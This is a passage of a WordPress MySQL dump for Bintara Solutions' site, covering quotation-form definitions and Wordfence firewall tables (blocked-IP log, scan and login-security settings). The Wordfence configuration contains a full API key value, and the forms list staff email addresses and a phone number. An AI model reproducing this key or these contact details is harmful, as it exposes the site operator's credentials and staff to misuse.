us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','61','Get Quotation (Asus)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(5,'get-quotation-d-link','Get Quotation (D-Link)','Get Quotation (D-Link)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','50','Get Quotation (D-Link)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(7,'get-quotation-belkin','Get Quotation (Belkin)','Get Quotation (Belkin)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','72','Get Quotation (Belkin)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(8,'get-quotation-broadbase','Get Quotation (Broadbase)','Get Quotation (Broadbase)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','83','Get Quotation (Broadbase)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(9,'get-quotation-canon','Get Quotation (Canon)','Get Quotation (Canon)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','94','Get Quotation (Canon)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(10,'get-quotation-epson','Get Quotation (EPSON)','Get Quotation (EPSON)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','107','Get Quotation (EPSON)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(11,'get-quotation-hpe','Get Quotation (HPE)','Get Quotation (HPE)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','119','Get Quotation (HPE)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(12,'get-quotation-jabra','Get Quotation (Jabra)','Get Quotation (Jabra)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','130','Get Quotation (Jabra)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(13,'get-quotation-dell-large-display','Get Quotation (Dell Large Display)','Get Quotation (Dell Large Display)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','141','Get Quotation (Dell Large Display)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(14,'get-quotation-targus','Get Quotation (Targus)','Get Quotation (Targus)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','154','Get Quotation (Targus)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','','');
/*!40000 ALTER TABLE `wpdp_visual_form_builder_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfblockediplog`
--

DROP TABLE IF EXISTS `wpdp_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT '0',
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfblockediplog`
--

LOCK TABLES `wpdp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wpdp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wpdp_wfblockediplog` (`IP`, `countryCode`, `blockCount`, `unixday`, `blockType`) VALUES ('\0\0\0\0\0\0\0\0\0\0ÿÿÆE°','CA',121,18164,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸','SG',11,18165,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~','US',122,18170,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ','CN',23,18177,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿÀ¤0','US',1,18174,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿ}iŒJ','CN',2,18165,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„','CN',23,18179,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿprh†','CN',1,18181,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿÀc','CA',2,18180,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿ.ic£','FR',1,18180,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“','US',7,18183,'waf'),('\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G','FR',63,18186,'waf');
/*!40000 ALTER TABLE `wpdp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfblocks7`
--

DROP TABLE IF EXISTS `wpdp_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT '0',
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT '0',
  `blockedHits` int(10) unsigned DEFAULT '0',
  `expiration` bigint(20) unsigned NOT NULL DEFAULT '0',
  `parameters` text,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM AUTO_INCREMENT=17898 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfblocks7`
--

LOCK TABLES `wpdp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wpdp_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfconfig`
--

DROP TABLE IF EXISTS `wpdp_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfconfig`
--

LOCK TABLES `wpdp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wpdp_wfconfig` DISABLE KEYS */;
INSERT INTO `wpdp_wfconfig` (`name`, `val`, `autoload`) VALUES ('alertOn_critical','1','yes'),('alertOn_update','0','yes'),('alertOn_warnings','1','yes'),('alertOn_throttle','0','yes'),('alertOn_block','1','yes'),('alertOn_loginLockout','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_adminLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_wordfenceDeactivated','1','yes'),('liveTrafficEnabled','0','yes'),('advancedCommentScanning','1','yes'),('checkSpamIP','1','yes'),('spamvertizeCheck','1','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_displayExpandedRecords','0','no'),('scheduledScansEnabled','1','yes'),('lowResourceScansEnabled','0','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_dns','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('liveActivityPauseEnabled','1','yes'),('firewallEnabled','1','yes'),('blockFakeBots','0','yes'),('autoBlockScanners','1','yes'),('loginSecurityEnabled','1','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('notification_updatesNeeded','1','yes'),('notification_securityAlerts','1','yes'),('notification_promotions','1','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_scanStatus','1','yes'),('other_hideWPVersion','0','yes'),('other_blockBadPOST','0','yes'),('other_scanComments','1','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_WFNet','1','yes'),('other_scanOutside','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('deleteTablesOnDeact','0','yes'),('autoUpdate','1','yes'),('startScansRemotely','0','yes'),('disableConfigCaching','0','yes'),('addCacheComment','0','yes'),('disableCodeExecutionUploads','0','yes'),('allowHTTPSCaching','0','yes'),('debugOn','0','yes'),('email_summary_enabled','1','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('ssl_verify','1','yes'),('ajaxWatcherDisabled_front','0','yes'),('ajaxWatcherDisabled_admin','0','yes'),('wafAlertOnAttacks','1','yes'),('disableWAFIPBlocking','0','yes'),('showAdminBarMenu','1','yes'),('displayTopLevelOptions','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayAutomaticBlocks','1','yes'),('scan_include_extra','','yes'),('alertEmails','faiz@bintara.com.my','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignoreUA','','yes'),('maxMem','256','yes'),('scan_exclude','','yes'),('scan_maxIssues','1000','yes'),('scan_maxDuration','','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('bannedURLs','','yes'),('maxExecutionTime','0','yes'),('howGetIPs','','yes'),('actUpdateInterval','2','yes'),('alert_maxHourly','0','yes'),('loginSec_userBlacklist','','yes'),('liveTraf_maxRows','2000','yes'),('liveTraf_maxAge','30','yes'),('neverBlockBG','neverBlockVerified','yes'),('loginSec_countFailMins','240','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('blockedTime','300','yes'),('email_summary_interval','weekly','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('wafAlertWhitelist','','yes'),('wafAlertInterval','600','yes'),('wafAlertThreshold','100','yes'),('howGetIPs_trusted_proxies','','yes'),('scanType','standard','yes'),('manualScanType','onceDaily','yes'),('schedStartHour','18','yes'),('schedMode','auto','yes'),('cbl_loggedInBlocked','','yes'),('cbl_action','block','yes'),('cbl_redirURL','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassViewURL','','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('blockCustomText','','yes'),('apiKey','9f5313557db0e74d1e2facdf2e47bf5d0728d9aa053e8392a22693aed15538f9cda861931b065e97afaa552e2aeeb19856b8dc850754229feb49d790efc40534','yes'),('keyType','free','yes'),('isPaid','','yes'),('betaThreatDefenseFeed','0','yes'),('timeoffset_wf_updated','1571971164','yes'),('cacheType','disabled','yes'),('detectProxyRecommendation','REMOTE_ADDR','no'),('dismissAutoPrependNotice','0','yes'),('onboardingAttempt1','skipped','yes'),('onboardingAttempt2','emails','yes'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('needsNewTour_dashboard','0','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_scan','0','yes'),('needsNewTour_blocking','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_scan','0','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('supportContent','{\"top\":[{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/blocked-or-locked-out\\/#i-am-locked-out-of-my-site\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"Blocked or Locked Out\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/blocked-or-locked-out\\/\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":0},{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":1},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":2},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":3},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":4},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":5},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":6}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your siteâ€™s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Blocked or Locked Out\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/blocked-or-locked-out\\/\",\"order\":0},{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":1},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":2}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence 